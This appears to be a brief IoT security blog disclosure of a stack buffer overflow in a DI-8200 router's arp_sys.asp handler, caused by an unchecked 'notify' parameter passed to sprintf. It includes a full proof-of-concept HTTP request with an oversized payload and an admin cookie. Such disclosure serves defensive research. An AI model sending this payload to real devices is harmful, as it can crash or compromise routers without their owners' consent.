专注于技术与IOT安全
DI-8200 arp_sys_asp Buf-OverFlow
DI-8200 arp_sys_asp Buf-OverFlow

DI-8200 arp_sys_asp Buf-OverFlow

arp_sys_asp

Details

In the arp_sys_asp function, the following parameters are controllable:

notify


After passing the parameters, they are then written into the stack using sprintf.

POC

GET /arp_sys.asp?notify=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&_=1750668593444 HTTP/1.1
Host: 192.168.0.1
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Referer: http://192.168.0.1/index.htm?_1420041694
Accept-Encoding: gzip, deflate, br
Cookie: wys_userid=admin,wys_passwd=6B4BED98A39AD592599AF9F3092B1782
Connection: keep-alive

Result

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注